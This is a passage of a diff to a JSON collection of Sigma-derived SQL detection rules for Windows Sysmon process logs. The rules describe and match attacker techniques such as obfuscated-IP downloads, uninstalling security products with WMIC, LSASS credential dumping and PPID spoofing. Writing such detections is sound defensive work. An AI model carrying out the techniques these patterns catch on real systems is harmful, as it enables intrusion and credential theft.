'%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE '%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s %' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" + "filename": "proc_creation_win_attrib_system.yml" }, { - "title": "Suspicious Windows Update Agent Empty Cmdline", - "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "title": "Obfuscated IP Download", + "id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", "status": "experimental", - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) 
in an URL combined with a download command", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.discovery" + ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\') AND ((CommandLine LIKE '%//0x%' ESCAPE '\\' OR CommandLine LIKE '%.0x%' ESCAPE '\\' OR CommandLine LIKE '%.00x%' ESCAPE '\\') OR (CommandLine LIKE '%http://\\%%' ESCAPE '\\' AND CommandLine LIKE '%\\%2e%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" + "filename": "proc_creation_win_susp_obfuscated_ip_download.yml" }, { - "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", - "id": "52ff7941-8211-46f9-84f8-9903efb7077d", - "status": "test", - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", - "author": "Florian Roth (Nextron Systems)", + "title": "Regsvr32 Spawning Explorer", + "id": "6f0947a4-1c5e-4e0d-8ac7-53159b8f23ca", + "status": "experimental", + "description": "Detects \"regsvr32.exe\" spawning \"explorer.exe\", which is very uncommon.", + "author": "elhoim", "tags": [ "attack.defense_evasion", - "attack.t1134.004" + "attack.t1218.010" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 
'%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_selectmyparent.yml" + "filename": "proc_creation_win_regsvr32_spawn_explorer.yml" }, { - "title": "Service Started/Stopped Via Wmic.EXE", - "id": "0b7163dc-7eee-4960-af17-c0cd517f92da", + "title": "Use of Adplus.exe", + "id": "2f869d59-7f6a-4931-992c-cce556ff2d53", "status": "experimental", - "description": "Detects usage of wmic to start or stop a service", + "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory 
and execute arbitrary commands", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.execution", - "attack.t1047" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Legitimate usage of Adplus" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service %' ESCAPE '\\' AND CommandLine LIKE '% call %' ESCAPE '\\' AND (CommandLine LIKE '%stopservice%' ESCAPE '\\' OR CommandLine LIKE '%startservice%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\adplus.exe' ESCAPE '\\' OR OriginalFileName = 'Adplus.exe') AND (CommandLine LIKE '% -hang %' ESCAPE '\\' OR CommandLine LIKE '% -pn %' ESCAPE '\\' OR CommandLine LIKE '% -pmn %' ESCAPE '\\' OR CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -po %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\' OR CommandLine LIKE '% -sc %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_service_manipulation.yml" + "filename": "proc_creation_win_lolbin_adplus.yml" }, { - "title": "DNS RCE CVE-2020-1350", - "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "title": "Suspicious VBoxDrvInst.exe Parameters", + "id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", "status": "test", - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detect VBoxDrvInst.exe run with parameters allowing processing INF file.\nThis allows to create values in the registry and install drivers.\nFor example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys\n", + "author": "Konstantin Grishchenko, oscd.community", "tags": [ - "attack.initial_access", - 
"attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" + "Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\VBoxDrvInst.exe' ESCAPE '\\' AND CommandLine LIKE '%driver%' ESCAPE '\\' AND CommandLine LIKE '%executeinf%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2020_1350.yml" + "filename": "proc_creation_win_virtualbox_vboxdrvinst_execution.yml" }, { - "title": "Renamed Jusched.EXE Execution", - "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "title": "Potential Tampering With Security Products Via WMIC", + "id": "847d5ff3-8a31-4737-a970-aeae8fe21765", "status": "test", - "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", - "author": "Markus Neis, Swisscom", + "description": "Detects uninstallation or termination of security products using the WMIC utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1036.003" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administration" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Description IN ('Java 
Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (Image LIKE '%\\\\jusched.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%product where %' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND CommandLine LIKE '%uninstall%' ESCAPE '\\' AND CommandLine LIKE '%/nointeractive%' ESCAPE '\\') OR (CommandLine LIKE '%wmic%' ESCAPE '\\' AND CommandLine LIKE '%caption like %' ESCAPE '\\' AND (CommandLine LIKE '%call delete%' ESCAPE '\\' OR CommandLine LIKE '%call terminate%' ESCAPE '\\')) OR (CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%where %' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) AND (CommandLine LIKE '%\\%carbon\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%cylance\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%endpoint\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%eset\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%malware\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Sophos\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%symantec\\%%' ESCAPE '\\' OR CommandLine LIKE '%Antivirus%' ESCAPE '\\' OR CommandLine LIKE '%AVG %' ESCAPE '\\' OR CommandLine LIKE '%Carbon Black%' ESCAPE '\\' OR CommandLine LIKE '%CarbonBlack%' ESCAPE '\\' OR CommandLine LIKE '%Cb Defense Sensor 64-bit%' ESCAPE '\\' OR CommandLine LIKE '%Crowdstrike Sensor%' ESCAPE '\\' OR CommandLine LIKE '%Cylance %' ESCAPE '\\' OR CommandLine LIKE '%Dell Threat Defense%' ESCAPE '\\' OR CommandLine LIKE '%DLP Endpoint%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Detection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Protection%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Security%' ESCAPE '\\' OR CommandLine LIKE '%Endpoint Sensor%' ESCAPE '\\' OR CommandLine LIKE '%ESET File Security%' ESCAPE '\\' OR CommandLine LIKE '%LogRhythm System Monitor Service%' ESCAPE '\\' OR CommandLine LIKE '%Malwarebytes%' ESCAPE '\\' OR CommandLine LIKE '%McAfee Agent%' 
ESCAPE '\\' OR CommandLine LIKE '%Microsoft Security Client%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Anti-Virus%' ESCAPE '\\' OR CommandLine LIKE '%Sophos AutoUpdate%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Credential Store%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Console%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Database%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Management Server%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Remote Management System%' ESCAPE '\\' OR CommandLine LIKE '%Sophos Update Manager%' ESCAPE '\\' OR CommandLine LIKE '%Threat Protection%' ESCAPE '\\' OR CommandLine LIKE '%VirusScan%' ESCAPE '\\' OR CommandLine LIKE '%Webroot SecureAnywhere%' ESCAPE '\\' OR CommandLine LIKE '%Windows Defender%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_jusched.yml" + "filename": "proc_creation_win_wmic_uninstall_security_products.yml" }, { - "title": "File Decoded From Base64/Hex Via Certutil.EXE", - "id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", - "status": "test", - "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. 
This can be abused by attackers to decode an encoded payload before execution", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "Computer Password Change Via Ksetup.EXE", + "id": "de16d92c-c446-4d53-8938-10aeef41c8b6", + "status": "experimental", + "description": "Detects password change for the computer's domain account or host principal via \"ksetup.exe\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-decode %' ESCAPE '\\' OR CommandLine LIKE '%/decode %' ESCAPE '\\' OR CommandLine LIKE '%-decodehex %' ESCAPE '\\' OR CommandLine LIKE '%/decodehex %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ksetup.exe' ESCAPE '\\' OR OriginalFileName = 'ksetup.exe') AND CommandLine LIKE '% /setcomputerpassword %' ESCAPE '\\')" ], - "filename": "proc_creation_win_certutil_decode.yml" + "filename": "proc_creation_win_ksetup_password_change_computer.yml" }, { - "title": "Rundll32 With Suspicious Parent Process", - "id": "1723e720-616d-4ddc-ab02-f7e3685a4713", + "title": "Renamed Sysinternals Sdelete Execution", + "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", "status": "experimental", - "description": "Detects suspicious start of rundll32.exe with a parent process of Explorer.exe. 
Variant of Raspberry Robin, as first reported by Red Canary.", - "author": "CD_ROM_", + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.impact", + "attack.t1485" ], + "falsepositives": [ + "System administrator usage" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'sdelete.exe' AND NOT ((Image LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" + }, + { + "title": "Suspicious Msiexec Quiet Install From Remote Location", + "id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", + "status": "experimental", + "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "medium", + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentImage LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '% -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE 
'\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\') AND (CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_parent_explorer.yml" + "filename": "proc_creation_win_msiexec_install_remote.yml" }, { - "title": "Filter Driver Unloaded Via Fltmc.EXE", - "id": "4931188c-178e-4ee7-a348-39e8a7a56821", - "status": "test", - "description": "Detect filter driver unloading activity via fltmc.exe", - "author": "Nasreddine Bencherchali", + "title": "Renamed CreateDump Utility Execution", + "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", + "status": "experimental", + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Command lines that use the same flags" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\createdump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_fltmc_unload_driver.yml" + 
"filename": "proc_creation_win_renamed_createdump.yml" }, { - "title": "Curl.EXE Execution With Custom UserAgent", - "id": "3286d37a-00fd-41c2-a624-a672dcd34e60", - "status": "test", - "description": "Detects execution of curl.exe with custom useragent options", + "title": "Suspicious Cmdl32 Execution", + "id": "f37aba28-a9e6-4045-882c-d5004043b337", + "status": "experimental", + "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1071.001" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR OriginalFileName = 'CMDL32.EXE') AND (CommandLine LIKE '%/vpn %' ESCAPE '\\' AND CommandLine LIKE '%/lan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_useragent.yml" + "filename": "proc_creation_win_lolbin_cmdl32.yml" }, { - "title": "WhoAmI as Parameter", - "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", - "status": "test", - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", - "author": "Florian Roth (Nextron Systems)", + "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", + "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", + "status": "experimental", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_whoami_as_param.yml" + "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" }, { - "title": "Read Contents From Stdin Via Cmd.EXE", - "id": "241e802a-b65e-484f-88cd-c2dc10f9206d", + "title": "Suspicious File Execution From Internet Hosted WebDav Share", + "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", "status": "experimental", - "description": "Detect the use of \"<\" to read and potentially execute a file via cmd.exe", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. 
As seen being used in malicious LNK files", + "author": "pH-T (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.003" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND CommandLine LIKE '%<%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_stdin_redirect.yml" + "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" }, { - "title": "Potential Credential Dumping Via WER", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ff3", + "title": "Potential Data Stealing Via Chromium Headless Debugging", + "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "status": "experimental", - "description": "Detects potential credential dumping via Windows Error Reporting LSASS Shtinkering technique which uses the Windows Error Reporting to dump lsass", - "author": "@pbssubhash , Nasreddine Bencherchali", + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1185" ], "falsepositives": [ - "Windows Error Reporting might produce similar behavior. 
In that case, check the PID associated with the \"-p\" parameter in the CommandLine." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Werfault.exe' ESCAPE '\\' OR OriginalFileName = 'WerFault.exe') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND CommandLine LIKE '% -u -p %' ESCAPE '\\' AND CommandLine LIKE '% -ip %' ESCAPE '\\' AND CommandLine LIKE '% -s %' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" ], - "filename": "proc_creation_win_werfault_lsass_shtinkering.yml" + "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" }, { - "title": "Suspicious Reg Add BitLocker", - "id": "0e0255bf-2548-47b8-9582-c0955c9283f5", + "title": "Potential Rundll32 Execution With DLL Stored In ADS", + "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", "status": "experimental", - "description": "Detects suspicious addition to BitLocker related registry keys via the reg.exe utility", - "author": "frack113", + "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", + "author": "Harjot Singh, '@cyb3rjy0t'", "tags": [ - "attack.impact", - "attack.t1486" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%REG%' ESCAPE '\\' AND CommandLine LIKE '%ADD%' ESCAPE '\\' AND CommandLine LIKE 
'%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\FVE%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%/f%' ESCAPE '\\' AND (CommandLine LIKE '%EnableBDEWithNoTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseAdvancedStartup%' ESCAPE '\\' OR CommandLine LIKE '%UseTPM%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKey%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMKeyPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessageSource%' ESCAPE '\\' OR CommandLine LIKE '%UseTPMPIN%' ESCAPE '\\' OR CommandLine LIKE '%RecoveryKeyMessage%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" ], - "filename": "proc_creation_win_reg_bitlocker.yml" + "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" }, { - "title": "Unusual Child Process of dns.exe", - "id": "a4e3d776-f12e-42c2-8510-9e6ed1f43ec3", - "status": "experimental", - "description": "Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", - "author": "Tim Rauch", + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", + "status": "test", + "description": "Detects a suspicious program execution in Outlook temp folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.initial_access", - "attack.t1133" + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\dns.exe' ESCAPE '\\' 